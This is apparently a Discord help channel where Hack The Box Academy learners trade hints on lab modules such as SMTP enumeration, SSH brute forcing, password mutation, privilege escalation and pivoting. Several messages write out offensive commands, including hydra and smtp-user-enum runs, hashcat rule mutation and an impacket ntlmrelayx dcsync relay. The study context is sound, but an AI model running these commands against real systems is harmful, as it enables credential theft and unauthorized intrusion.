#modules

1 messages ยท Page 97 of 1

valid cipher
#

pls share new tools

rustic sage
#

no

valid cipher
#

๐Ÿ˜ฆ

rustic sage
#

git gud, join private communities

#

tool and resource share

rough comet
#

Folks... on Footprinting / SMTP ... I am not able to answer the 2nd question (with the tool and provided resource). metasploit modules does it for me, using same resource. Can someome DM me?

zinc marsh
#

u are in the right way to get arrested when u re 18 fingerguns

zinc marsh
#

if u wanna be black hat at least learn evasion first pika_sip

#

or ur career gonna be short

fathom pendant
#

Lol

valid cipher
#

i have protonvpn

zinc marsh
proud pine
#

smh

zinc marsh
#

The updated linux privielege escalation is much better now on my pov

thorn urchin
fathom pendant
proud pine
#

How did you get the IP of my coffee machine?!

thorn urchin
fathom pendant
#

Oh class c?

#

Iirc that's c

thorn urchin
#

I can never remember

proud pine
#

Class is related to subnet, not IP scheme.

fathom pendant
#

It's still carried on...

#

192/172/10 denote the general assignment

proud pine
#

but those just indicate private IP space. You could use 10.0.0.0/8 as a class A, or 10.0.1.0/24 as a class C.

thorn urchin
#

yeah but theres still a general "default" convention with em

fathom pendant
#

^ it helps

#

Also inheritance of parent network

zinc marsh
#

how u going with ur report by the way

#

madf0x

rough comet
thorn urchin
#

Im only gunna worry about fillings bits an pieces in over the week and then really double down on Saturday and Sunday to get it to standard

quick cairn
#

hi , i'm having some trouble getting the reverse shell to run from "Attacking Common Applications" under "attacking splunk"
i edited the script that was provided to put my own ip/port in, but i'm not getting any connections back

zinc marsh
thorn urchin
#

yeah but evenings are exhausting to me so im pacing things

zinc marsh
#

u got a lot of time to write it luckily

thorn urchin
#

yup so ima use it

zinc marsh
#

shouldn't be too hard in my notes i just have

#

Configure the "reverse_shell_splunk"

quick cairn
zinc marsh
#

then i just used tar and uploaded the file while listening

zinc marsh
#

i guess it was just follow the section

quick cairn
#

ok thank you

zinc marsh
#

in what port are u listening

#

maybe the the firewall is blocking it

#

I checked the section and it is just put ur ip and port in the script and upload it

quick cairn
quick cairn
zinc marsh
supple patio
#

How long did it take?)

quick cairn
zinc marsh
#

it is too simple to do, it is just change the ip and port, start the listener, convert it to tar and upload it

quick cairn
valid cipher
#

after conpleting linux module, which module did u guys do next

zinc marsh
valid cipher
#

but it has a bunch of prereqs

#

and then the prereqs of those prereqs have prereqs

zinc marsh
#

then learn the prereqs

valid cipher
#

whats the fastest way of becoming a hacker

zinc marsh
#

do what u want

#

if u think u dont need to learn about windows then dont learn about it

valid cipher
#

ok

acoustic owl
valid cipher
zinc marsh
valid cipher
thorn urchin
valid cipher
#

ok

zinc marsh
valid cipher
#

goodnight peeps

bold rapids
#

I need help with this idea.
In shellcoding tools
the question is
The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of '/flag.txt', then connect to the sever with "nc SERVER_IP PORT" to send the shellcode.
Do I need to create my own shellcode? like using exeve? since I tried other standard shellcodes and I get failed to execute shellcode? My best guess is that its too many bytes long. Since I tried msfvenmon without luck

Just from re reading it, I can use one of the tools to generate a shell code. Am I doing something off, since when I test on my pc it works great

misty mural
#

Iโ€™m working on the Information Gathering skills assessment and am on the last question on subdomain enumeration.

Iโ€™m given a clue that a particular string is located in the subdomain. Gobuster has given me several subdomains working from a wordlist. How would I move forward searching for one that contains the string?

#

It seems the possible formats could be {str}123.app.githubapp.com or app.visit{str}.githubapp.com.

Iโ€™m not certain how to approach the problem.

misty mural
#

Well never mind. theHarvester was my friend.

zinc sentinel
#

anyone free to talk about Exploiting Web Vulnerabilities in Thick-Client Applications. stuck at the first first stage of logging into fatty client .new
constant connection error

quiet ember
#

You can dm for clarification if you want

umbral wigeon
#

Still need help for this.

I have made a little more progress as follows:
||- Creation of accounts with "admin" prefix is forbidden, however there are no accounts called "admin" or "administrator" (tried case sensitive as well)

  • Creation of guest account is forbidden, and there is indeed a account named "guest"
  • Enumerated all support.xx from aa-zz (support, support.it, support.uk, support.cn, support.gr)
  • For each of the above support accounts, and guest, I encoded the cookie properly with the role (i created a larger list of case-sensitive roles, such as super, superuser, sudo, root, admin, Admin, administrator, Administrator, staff, manager, etc.etc.)
  • I also received the message "time to roll up your sleeves and move on" ||

Would appreciate if someone could point out if I'm in a rabbit hole, as I'm unsure if i just have to enumerate more roles or I that im not even close at all

winged shore
#

hi so I found the interesting file I'm pretty sure, but not sure how to read whats inside? did you have to escalate your privileges to find the flag or is grep really all you need here?

rustic sage
#

otherwise, cat or type

zinc sentinel
rustic sage
#

cat <file> | grep HTB

mortal locust
#

I have a doubt about Credential Hunting in Linux, The exercise wants us to use hydra and bruteforce the ssh ? using the Resources (Password.txt and Username.txt)?

acoustic owl
modern falcon
#

Does bloodhound have a way to list all the ACLs of a particular user like the Powerview's Get-DomainObjectACL command?

tender shuttle
#

Anyone Please Help : Attacking Common Applications - Skills Assessment II What is the URL of the WordPress instance? i have found the vhost b*** , but it is not accepting as an answer.

tender shuttle
steady hawk
#

Sure

umbral wigeon
# acoustic owl try to get the password of the support user. Then take a close look at the cooki...

not sure if it is intentional, but i found a credential of support.gr account with a working password that deviates from the password policy in the account creation page. (it does not have $#@)
So im assuming if i try the unfiltered 14million list in rockyou.txt i can eventually find the password of support? (since likely it does not follow the traditional password policy as well)
Only thing stopping me from doing that is the occasional 25 seconds delay the login page has to prevent total bruteforce

urban sage
#

Thank you.

umbral wigeon
#

i already have the working credentials for support.uk but PayloadBunny said to try and find for support (without the country)

acoustic willow
#

Take a look

umbral wigeon
#

i know how the cookies work (including how to decrypt and encode), what's left is enumerating the roles which i mentioned i couldnt in my main help message

#

can i dm?

acoustic willow
#

ok

umbral wigeon
fluid pivot
#

How to learn hacking or can anyone help me to learn

analog dock
supple patio
#

It says it would take 7 days

#

Well, you gave me a motivation

analog dock
#

With regular hours it would yea

trail leaf
#

Any help on the last two questions of the Skills Assessment part 2 on Active Directory Enumeration and Attacks? Struggling to get a shell on DC with the user that has GenericAll privs :/

sonic forge
#

anyone around for some pointers on Footprinting medium chall?

hasty solar
#

Hi , i need help on Notetaking & Organization, anyone knows why the question Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) is not accepting answer ||[Ctrl] + [B] + [%]||

analog dock
#

In the burp intruder section from using weg proxies, I found the index.html but it gives no output, so canโ€™t see a flag

#

Is there something Iโ€™m missing?

hasty solar
#

cause gotta leave the pc

pine dagger
analog dock
#

NVM, didnโ€™t do it right

autumn pilot
#

let's not share flags, even if they are non working ones

rustic sage
#

Hi, I'm in module pivoting in section web server pivoting with rpivot, i did what i should but when i connect to the web server i don't see the flag, can someone help me

#

I tried what was written on the red line but it gave me the wrong answer

zinc sentinel
analog dock
#

Why does my scan not work?

#

Only getting errors

#

Should be fine right

worn bronze
#

Maybe try gobuster vhost

rustic sage
valid cipher
rustic sage
#

what makes you think hes a boomer?

valid cipher
valid cipher
analog dock
#

But thatโ€™s not an answer to my question

#

Why does it not work?

rustic sage
#

Provide the module, chapter, and question as well as your full command

analog dock
#

Skills assessment - web fuzzing from the attacking web applications with ffuf module

rustic sage
#

and the command?

analog dock
#

Is in the picture

valid cipher
#

have u tried it with 80 and 443

analog dock
upper fjord
#

Try https with port 32252. If I remember correctly

rustic sage
#

Hi everyone,

I'm doing Password Attack module, and when attempting to bruteforce SSH with crackmapexec, it seems very slow (1 request / 2-3 seconds).
Is there a way to speed up ? Is it a default parameter for stealth ? Or is it my hardware fault ?
It will take hours just to finish a simple exercise ๐Ÿ™‚

analog dock
rustic sage
#

@analog dock ffuf -w ./wordlist -u http://target.com -H "HOST: FUZZ.target.com" -fs 69420

#

try something like that.

upper fjord
rustic sage
#

no prob

valid cipher
#

i thought websites can only listen on 80 and 443

#

is that not true

rustic sage
#

no lol

#

those are just standard ports

#

you can route

valid cipher
#

oh

short temple
#

Heyy ....
Anyone has "suse certified administrator" SCA question dumps ?

acoustic owl
umbral wigeon
analog dock
#

?

autumn pilot
#

Try to explain your issues without spoiling anything in terms of potential routes or commands

analog dock
#

Well itโ€™s not really a spoiler if itโ€™s wrong right?๐Ÿ˜…

autumn pilot
#

but it can mislead other users

analog dock
#

Anyways Iโ€™m at the second question of the skills assessment - Website of module Login brute forcing. Using the user found in question 1, and rockyou as a pass list, it gives me false positives

umbral wigeon
analog dock
#

I checked the form with burp suite and changed this accordingly

analog dock
#

I was dumb

autumn pilot
#

you can view the source code of the page, and see if you can reproduce the same behavior by sending a file that has only the paragraph arguments

#

example: are you sure you are running php code and not html with that payload?

fathom pendant
#

Doesn't html use <script>?

autumn pilot
#

I was referring to the web server

upper fjord
#

I need help with logrotate and sudo sections in linux privesc. Can I dm?

upper fjord
zinc sentinel
upper fjord
#

Thanks

mortal locust
#

Can anyone help me withv this?

I have a doubt about Credential Hunting in Linux, The exercise wants us to use hydra and bruteforce the ssh ? using the Resources (Password.txt and Username.txt)?

acoustic owl
mortal locust
rustic sage
#

Does anyone know a discord server for hacking, for topics outsite of hack the box scope?

acoustic owl
acoustic owl
mortal locust
pine dagger
mortal locust
pine dagger
#

Oh, are you not using the custom.rule file?

mortal locust
#

I have tried that as well

If you are saying the custom.rule is

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

pine dagger
#

Did you read the Hint?

mortal locust
#

I did that is why I m mutating "LoveYou1"

pine dagger
#

Yes... but the Resources contains a custom file for mutating the password.

#

You're mutating with one of the standard files.

mortal locust
#

Right ๐Ÿ˜ฆ

I was stuck in this form 12 hours

pine dagger
#

Which Module?

mortal locust
#

Thanks I will try that

pine dagger
#

Err, which Chapter in the Module?

#

Credential Hunting in Linux?

mortal locust
#

yes

just because I did not see the custom rule attached

pine dagger
#

Well, I hope that works for you. My notes are a little spotty on that Module

pine dagger
#

I don't think I'll be much help on password attacks. As I said, my notes are very very spotty

mortal locust
#

okay ๐Ÿ˜ฆ

I have mutated the password with the custom.rule

pine dagger
#

That was literally the module that I realised I needed to take better notes

mortal locust
#

I have already created one using hashcat --force pass.txt -r custom.rule --stdout | sort -u > mut_password.list

Where pass.txt have the password which was given as a hint

and If i try to use hydra with hydra -l Kira -P mut_password.list -V -t64 ssh://<IP>

Its not giving me right password

pine dagger
pine dagger
#

The question being: Examine the target and find out the password of the user Will. Then, submit the password as the answer.

mortal locust
pine dagger
#

Just making sure we're on the same page

mortal locust
pine dagger
#

Oh

#

You know what it might be

#

let me check, one moment

#

Yeah... your 2nd issue is that you are using the username "Kira", not "kira"

mortal locust
#

I m sorry but I have tried both of them

pine dagger
mortal locust
pine dagger
#

Try using ftp instead. Its better for testing.

#

SSH is slower, and has a lot more timeouts

mortal locust
#

nope its the same

pine dagger
#

what's in your pass.txt?

mortal locust
#

LoveYou!

pine dagger
#

Well

#

There's your 3rd issue

#

Its LoveYou1

mortal locust
#

ahhhhhhhhhhhh

#

I m sorry

pine dagger
#

lol

mortal locust
#

Got it

#

Thanks Man ๐Ÿ™‚

That was so dumb

pine dagger
#

np. Just glad my notes were up to the challenge.

rapid sparrow
#

I stuck at this when loading the command, after 2-4 mins and still no respond, is this normal?

pine dagger
#

That one takes a bit, so give it a little time. 3 minutes does sound a little excessive

#

Maybe worth resetting the environment

rapid sparrow
rapid sparrow
spring sky
#

Hello fellas, I'm having a trouble with the following question in academy: If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.

My answer that's "incorrect": ||nvXc100||

pine dagger
spring sky
#

Oh, sorry, the question is from: INTRO TO NETWORK TRAFFIC ANALYSIS, Tcpdump Fundamentals

pine dagger
spring sky
#

Thank you!

rapid sparrow
loud vapor
#

Hi guys, any hints for escaping restricted shells section in Linux PE module ?

brazen canopy
#

Hi guys!
Anyone pass footprinting>smtp?
(Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.)
I tryed
sudo smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/common_roots.txt -t 10.129.214.65
sudo smtp-user-enum -M VRFY -U /opt/useful/SecLists/Discovery/SNMP/snmp.txt -t 10.129.214.65
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
sudo smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65
ismtp -h 10.129.214.65:25 -e /usr/share/metasploit-framework/data/wordlists/unix_users.txt
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.214.65

no luck ๐Ÿ˜ฆ
any hint here?

autumn quarry
#

can anyone tell me why i am answering questions and i am just starting for?

#

i am expected to have the answers and im just now starting makes no sense

#

IIbackwardthe first 3 questions ive answered but they expect me to know what open VPN they use to connect to the labs. i just started and def don't have the answers,now i have to find they answer is a bit backwards learning for me when i do not have the fundamentals yet

tall birch
#

where can I suppy a feedback or a simple typo in a module ?

#

thanks

earnest ginkgo
#

Hi everyone, I am doing the module Windows Attack & Defense, more precisely the exploitation Print Spooler & NTLM Relaying . I am always trying exploitations in my own home lab to experiment more about the exploitations and patches. In this vulnerability, we use impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support to relay a connection from a DC to another one and try a DCsync. But we can see that NTLMRelayx try to use Zerologon, I don't understand why and the course doesn't tell about it.

brazen canopy
#

I'm first time asking about it

fresh compass
#

Hi! In the Footprinting module, smtp section I'm having problem to find the user they are requesting

#

I have tried with nmap script, with metasploit list

#

I have even tried with bash scripting and telnet vrfy command

#

I have found quite a lot users but not the one they are requesting

autumn quarry
#

again need help with these questions on walkthrough

#

makes no sense why i am doing this and i just started

#

with all do respect but this is trash that they make you go through this with NO knowledge base help nor no reading materials been stuck on the same question for over an hour and reading whatever they have on the site but it does not help with questions

brazen canopy
#

Aa yes I checked. But it didn't work ๐Ÿ˜•

misty current
#

Also try hitting enter a few times

rapid sparrow
misty current
#

Cool

keen compass
#

I am stuck on what looks like a mal formed question or I may just be crazy...
PIVOTING, TUNNELING, AND PORT FORWARDING > Meterpreter Tunneling & Port Forwarding :
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"

The autoroute output looks like this :

#

in the format x.x.x.x/x.x.x.x, the only valid route I can see is the second one 172.16.4.0/23 in which 172.16.5.19 is.

#

When I post that subnet in the form ||172.16.4.0/255.255.254.0|| it tells me I am wrong...

#

any suggestions please ?

keen compass
stiff moon
#

having problem on the linux privesc with logrotten. anyone to help me quick?

sleek epoch
#

Hey guys how do you make notes? I thinking of an effective ways to keep the notes. Any tips would be appreciated

rough comet
pine dagger
rough comet
#

For HTB and training notes? I have it like this

#

I have Enum 1st, obvious reasons

#

Then Priv esc, and so on

pine dagger
#

I document how to do each question with step by step, and each command called:

rough comet
#

nice

#

I took a different approach and extract the topic , as the main goal, at least for me, is use the knowledge for any box. But that is a good idea too.

pine dagger
#

Of course, that's separate. I've got notes from the module, and the cheat sheets saved. But if I ever need to come back to do a refresher, its easier to replicate from notes, and understand why and how you do something.

quasi wave
#

the reverse shell isn't showing up on nibbles. I went back and decided to try the privilege escalation section of getting started again. do I have to start over?

proud pine
#

Better to move away from cloud-based solutions, since you can't use them for customer data.

quasi wave
#

if someone could help me get the reverse shell and then you can leave me to keep trying the next step that would be graet

#

etc

rough comet
#

On my case, is for my own notes.

#

But you can have customer data on the cloud as long as you use proper encryption.

proud pine
#

Yeah, but then you end up needing 2 sets of note-taking programs - why not just unify?

#

And no, you can't just 'encrypt' the data - it depends entirely on contractual obligation.

rough comet
#

the cloud is no less or more secure than on premise, it just depends of how you use it .

rough comet
#

You can have customer data on the cloud, no issues with that. Is it allowed or not? depends of the contract

balmy saffron
#

Hello, in socks over rdp...
I managed to start the socks plugin on the foothold. From there I connect successfully to the pivot and transfer the socks server. Started it. Verified the listening on the foothold with netstat. Then configured proxifier in socks5. Then it fails to connect to the distant target (172.16.6.155). Mstsc.exe does not appear in the proxifier window either.
How to solve that?

proud pine
thorn urchin
rough comet
#

sorry, you seem to go from one place to another and talking different things

#

my own note taking, is done on the cloud

#

keeping customer data on the cloud? it depends of what you sign

proud pine
#

It sounds like you're the one confused here. I just said that if you do use a cloud-based note solution, you end up with having to use two note-taking solutions anyway, since all customer data has to be local. You might as well unify, at that point.

rough comet
#

my example to the Op was about how I keep my notes for HTB, OSCP and learning

quasi wave
#

hi is anyone available for a DM from me so that I can get one on one help with this box?

rough comet
#

which box?

quasi wave
#

nibbles. its for the getting started module.

#

I meant the nibbles privesc section of getting started module

#

not actual box

rough comet
#

what's the question or what issue are you facing?

quasi wave
#

its a walkthrough and I am trying to get a reverse shell and I think I missed a step

#

etc

#

its not letting me get reverse shell

rough comet
#

what's the error? mind posting?

quasi wave
rough comet
#

did you check if the port is available?

quasi wave
#

no error just no reverse shell

thorn urchin
rough comet
#

nah, I do not like to keep my own notes locally

#

personal preference, better backup

#

that's just me, and again, that's for MY NOTES

thorn urchin
#

I sync my encrypted obsidian notebooks. Got em on my phone, laptop, desktop, and work laptop.

rough comet
quasi wave
proud pine
# rough comet that's just me, and again, that's for MY NOTES

... okay? and? We're trying to point out that you still have to take notes during a penetration test. Those notes will now have to be stored in a second note-taking app, that is local. So... since you already have to use a local solution, why not migrate all your notes to that solution, instead of using two?

dire birch
#

anyone here can gimme some hint for assembly data movement task?

warm heath
#

I couldnโ€™t find a thread to post this question in, so Iโ€™ll ask here and if not allowed I understand. At work today I found an iPhone in a stolen recovery truck. I process the trucks. Iโ€™ll detail, do mechanical maintenance and body work to get them ready for retail sale. Iโ€™m just wondering if there is a way I can get it unlocked so I can contact the owner to return it to them

thorn urchin
thorn urchin
#

but otherwise no your question about unlocking stolen phones isnt welcome here

warm heath
#

Itโ€™s not stolen but thanks anyways ๐Ÿ‘๐Ÿผ

thorn urchin
#

drop it off for the police if its genuine

warm heath
#

Will do thanks boss

thorn urchin
#

I work in repair and moderate the mbl repair discord, I see your kind of question 10x a day

dire birch
#

sorry madf0x, have you done maybe the assembly module?

thorn urchin
#

Ive not but I do know some assembly so ask your question anyways

dire birch
#

i have a task to move the value in "rsp" to "rax". I tried with mov rax, [rsp]

#

got segmentation fault error

thorn urchin
#

which asm flavor

dire birch
#

intel

thorn urchin
#

also [] is for dereferencing the address in the register, so youd be transferring data to the memory pointer stored at that location, so it wouldnt be moving the rsp value to rax per say

dire birch
#

i see

thorn urchin
#

so drop the [] if you want to straight clone the contents of rsp which may or may not be just a pointer value.

#

[] for when you want to access the data the pointer points at.

#

Im guessing your situation may not even involve pointers at all, hence the seg fault for accessing an invalid memory region

dire birch
#

i need to have move value from rsp to rax

#

so [] makes sense here for me

#

anyway, one day imma figure this out

thorn urchin
#

well not necessarily

#

[] is for the value of the pointer stored in rsp

#

no [] is for the raw value stored in rsp

#

if the contents of rsp = 4, then [] would try to dereference the memory address at 0x00000004 which would be invalid

#

if the contents of rsp = 0x76100341 and that happens to be a memory address containing the value of 4, then youd use [] to pull the value 4 instead of copying the memory address

dire birch
#

hmm i see

#

idk still but thx for helping tho

thorn urchin
#

best of luck

tight mesa
#

hello every body, anyone knows how to unzip a file under a RDP Windows machine?

thorn urchin
#

explorer

tight mesa
#

I'm stuck under the question to calculate the hash of a file in the File Transfer module

#

I can find winzip or anything like that

rough comet
#

what version of Windows

#

I do not remember, but most recent Win version can unzip that via explorer

#

after Win2016 I think

#

another alternative is using PS: Expand-Archive

#

Expand-Archive -LiteralPath c:\temp\file.zip -DestinationPathC:\temp\file

tight mesa
#

ty y'all....

#

but now, anyone knows why this message error [-] SMB2_TREE_CONNECT not found upload_win.zip

#

could be a .zip restriction/policy under the Windows Machine?

#

yep

#

Iแธฟ not using Kali

#

ok.

#

also Im not using xfreerdp instead Im using reminna

#

switching to xfreerdp

outer vault
#

Need a nudge on last flag of final assessment in deserialization module? Figured out the checksum mechanism and found the hidden feature, but seems like my generated payloads arent working ๐Ÿ˜ฆ

tight mesa
#

@slender shoal sorry bother you with sally question but, how suppose I can find the /drive: ???

#

now I'm in xfreerdp

#

hmm ok.

#

ty @slender shoal

#

I really doesn't know about that share folder

#

is this a xfreerdp feature?

thorn urchin
#

the share will show up in explorer

ashen viper
#

Htb Academy linux privilege escalation. Enumerate the linux environment and look for interesting files that might contain sensitive files. I am stuck here. I need answers .

pine dagger
#

Try grepping for something that looks like a flag.

trail leaf
#

It's also possible to escalate privileges into the lab_adm user, which will point you in the direction of the flag ๐Ÿ˜‰

pine dagger
#

72 modules done. 8 modules to go! I will get to zero modules.... if they stop releasing new ones! ๐Ÿ™‚

red current
#

Don't know if anyone is available to assist with this. I'm in the dnsadmins section in Windows Priv Esc and I have gone through and restarted the instance several times. No matter how carefully I follow the steps, I can't seem to add myself to the Domain Admins group. Is anyone available to assis with this?

trail leaf
#

Out of curiosity, how many of those modules did you pay for out of pocket versus getting the trickle-down from the cubes you get by completing a module?

pine dagger
#

Most were on trickle down + subscription

#

Subscription more than others

#

I only had to buy some towards the end.

#

It depends how hard you go at it. If you are smashing through them, then you'll need more cubes in a month, so higher tier sub is better.

trail leaf
#

oh so you're also getting the monthly cubes from silver annual (or whatever subscription you have)

red current
#

Has anyone here made it through the dnsadmin section in Windows Priv Exc? I could really use some help. I don't understand why it's not working.

pine dagger
#

Yeah, I was on silver. I upped to platinum last month as it was more cost effective, as the t4 modules cost 1,000 modules each.

trail leaf
#

you would want to use ssh2john to turn it into a hash, and then crack the output of that

#

but this key isn't even encrypted with a password

#

so what are you trying to crack big_think

#

oh wait nvm I'm dumb, I guess keys don't explicitly say that they're encrypted

#

maybe it's an RSA thing

#

regardless, ssh2john is your friend, but I don't remember needing to do that during the pivoting lab

#

did you do chmod 600 id_rsa?

pine dagger
thorn urchin
#

usually theres a header if it is encrypted

trail leaf
#

That's what I thought but I just generated a new keypair on my system and the header wasn't there

thorn urchin
#

well the ones ive seen in the modules that were encrypted all had a header

red current
trail leaf
red current
#

I realize that once I'm added I need to log off and log back on. I'm not able to even get to that point.

thorn urchin
pine dagger
red current
trail leaf
thorn urchin
#

cool

trail leaf
#

To get back to your question, genuinely don't remember needing an SSH key, pretty sure all the credentials you need are on the box. If you really want to use an SSH key (totally valid, great persistence method), just stick your own public key into the authorized_keys file and use that key instead

sonic bay
#

I find it really hard to learn the material in the way HTB is teaching it. I have no prior Linux knowledge and the questions in the Linux mod dont always line up with what was talked about in the txt. Doesnt help that im more of a visual learner. Any suggestions?

hollow thunder
#

can anyone nudge on file upload skill assessment. I believe i have the correct formatting for the URL, but not finding my test image i uploaded

sonic bay
#

@slender shoal i was stuck in the Filter Content section in the Linux Fund. for 60min before i said fuck it and looked up the answers. i dont understand how people are comming up with the last command with out prior knowlage

#

i must have been over looking it. i did man help. even tried screening in in the house lol

thorn urchin
#

HTB content is very much geared towards teaching you a little bit, and then putting you in an unfamiliar situation related to what was taught with the expectation that you reach out of your comfort zone and figure out how to discover the solution on your own.

balmy saffron
#

Hello, in socks over rdp...
I managed to start the socks plugin on the foothold. From there I connect successfully to the pivot and transfer the socks server. Started it. Verified the listening on the foothold with netstat. Then configured proxifier in socks5. Then it fails to connect to the distant target (172.16.6.155). Mstsc.exe does not appear in the proxifier window either.
How to solve that?

@SQLMantra
You can have customer data on the cloud, no issues with that. Is it allowed or not? depends of the contract

hollow thunder
tight mesa
#

anyone know why the python3 uploadserver with default port works

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...```
But with port *443* NOT
```$ sudo python3 -m uploadserver 443
/usr/bin/python3: No module named uploadserver```
tight mesa
#

under the file transfer module Linux File Transfer Methods section, if the target machine Ubuntu has not options to decompress files with unzip or 7z or any other, what option do we have?

wheat garden
#

yes if you still need help with this get back with me

trail leaf
#

DM if that's needed

muted fiber
#

Hey everyone! I am struggling with "Login Brute Forcing" module and I am currently doing the 2nd flag in the "Skill Assessment - Website" section.
The task is: "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?".
The hint is: ||"You may reuse the username you found earlier. Make sure you got the correct fail string and parameters". The username the hint is talking about is "user" cause that is the username that is used for the previous flag, also I have checked the parameters of the form and they are: user and pass but I'm not really sure what the hint talks about with "fail string".||
I am trying to execute the code: ||hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f HOST -s PORT http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='admin_panel'"|| and the correct password seems to be ||123456789||.. but when I try it out in the form, it does not work at all.. what am I doing wrong here?

wheat garden
umbral wigeon
#

you can dm me if u need additional help

muted fiber
wheat garden
muted fiber
umbral wigeon
#

fail string is not false positive, but a wrong fail string causes false positives

wheat garden
#

Ive used hydra alot even on real engagements a few times its given me false positives

spice tusk
#

Need a little help with this one... Please
Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?
User and Group Management section, INTRODUCTION TO WINDOWS COMMAND LINE
hint was: Get-ADUser Cmdlet along with a "-Filter"

heavy marsh
#

Are there official walkthroughs on the module questions and labs anywhere?

#

I'm getting tired of searching for bits and pieces of information on each question.

vital adder
vital adder
heavy marsh
#

They tell you to submit the whole banner, but by that they mean the whole banner minus the "200"

fathom pendant
#

200 is status code, not part of the banner

heavy marsh
#

They also didn't explain the portion where it asks you for an email as password for the anonymous login.

#

So I just figured that out on the fly I guess.

fathom pendant
#

Anonymous is just anonymous

#

ยฏ_(ใƒ„)_/ยฏ

heavy marsh
#

yeah, but it asked for a password and I bypassed it by just hitting enter

fathom pendant
#

Yes

heavy marsh
#

it would have been nice if the lesson explained that

fathom pendant
#

Thats how anonymous works

heavy marsh
#

Just wasn't explained

fathom pendant
#

not all things are explained in modules ยฏ_(ใƒ„)_/ยฏ

#

But put it in this perspective: how can you log in as anonymous if it's password protected.

heavy marsh
#

Yeah, that's too bad, good thing I have some background knowledge.

fathom pendant
#

it's not about having background knowledge. Sometimes it's just the obvious solution is correct ยฏ_(ใƒ„)_/ยฏ

heavy marsh
#

Thank you

#

Well I did a couple of learning paths on Tryhackme before coming over to HTB Academy, so that helps.

#

Even though Tryhackme is garbage in comparison to HTB Academy.

fathom pendant
#

I had (virtually) no experience prior to htb

vital adder
modern falcon
#

Module name: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section name: Domain Trusts Primer
Question:
What SharpHound command should I use so that bloodhound can map domain trusts like what is shown in the picture in the "Visualizing Trust Relationships in BloodHound" subsection?

Currently I run .\SharpHound.exe -c ALL --searchforest --zipfilename <file>, but I get "NO DATA RETURNED FROM QUERY" when I tried to use the "Map Domain Trust" analysis option on bloodhound

mortal locust
#

Hello

Stuck In Password attacks โ€œPasswd, Shadow & Opasswdโ€

I have got the shadow and passwd files.

For cracking purpose, i m using hashcat -m 1800 -a 0 unshadowed.hashes /home/username/Downloads/mut_password2.list -o /unshadowed.cracked

and the mutpassword2.list is generated from using hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password2.list

here the custom.rule was used from the resources. Am I missing something?

mortal locust
summer flame
#

Hi, can someone help me on 'Exploiting Web Vulnerabilities in Thick-Client Applications'? i am on the last part where i should amending 'user.java' but i think i am not editing it correctly. can someone advise? should i be adding the portion in or overwrite the existing content of the classes?

wise vault
#

any attack for httponly if it is not set

#

can we get rev shell?

sleek epoch
#

Hey i wanted to ask the question that the Mac address here returned in the output is if the target host, right? What if the attacker and target both are on the same network ? Then the Mac address returned is will be of whom ? Attacker or target?? Can we confirm it by checking and matching the attacker (our) Mac address with returned Mac address

#

I can't send the pic here **

wise vault
#

yes

pulsar needle
#

Skill Assessment - Web Proxies, Why cant I get the flag, it tells me to enable the button and click it to get the flag, but i have done that and it just reloads the page with the exact same data

analog dock
pulsar needle
#

I have enabled the button

analog dock
#

Send to repeater and keep trying

pulsar needle
#

With ZAP

analog dock
#

Hint says you have to click more often right?

pulsar needle
#

Aaaaaaaaaa

analog dock
#

So send it to repeater and try till you see content length change

pulsar needle
#

Oke

naive wadi
#

doing password attacks and cannot get hydra to compile with ssl support

#

I have been trying to follow the instructions on the github

frigid fable
#

pw

naive wadi
#

but some of the packages are not availble

pulsar needle
#

Aaa

#

Got it now

#

Thanks

vital adder
pulsar needle
#

I am supposed to decode this until i get a 31 character string, how does this help? Its the only value I can get using burp

vital adder
naive wadi
pulsar needle
#

I tried to decode it as base64

sleek epoch
vital adder
#

feel free to shoot me a dm if you still need help

naive wadi
#

e.g. I am doing password attacks, network services & just need to the resources that are in the module on the pwnbox.

vital adder
#

so you issue is you can't get the resources on to the pwnbox?

#

just wget the resource link on the pwnbox

naive wadi
naive wadi
#

I had originally done a simple python http server on my own machine on the vpn but was getting a 405 error when using wget from pwn

vital adder
pulsar needle
naive wadi
#

so was going to compile from source instead

#

got frustrated and didn't even think to wget the resources link

#

thanks

vital adder
naive wadi
sleek epoch
#

Guys are there any similar course like learning mindest of hackers similar to the one in htb academy? Appreciate any help

vital adder
naive wadi
#

I did get the executable

vital adder
#

so it's work for you in the end?

naive wadi
#

it compiled but without the SSL support needed

#

despite passing the flags etc

vital adder
#

but wait how tf did your kali don't have hydra?? it's one of the default tool

sleek epoch
#

๐Ÿ˜‚๐Ÿ˜‚

turbid lily
#

WSL2 maybe?

naive wadi
#

not WSL2

#

it just wasn't playing ball

#

so recompiled

rustic sage
#

yo

ashen viper
#

I need command to get answer to rhe linux privilege escalation question 1. I have tried different regex commands. I need help

vagrant gust
#

is medusa the only tool you can use for attacking ftp in attacking common services?

#

i tried hydra with both 64 and 48 threads and i got nothing

zinc sentinel
zinc sentinel
vagrant gust
#

just easier for me personally

#

what have you tried

#

cuz if i remember correctly that lab was pretty straightfoward

#

once u found the archive

zinc sentinel
#

maybe try less threads ?

vagrant gust
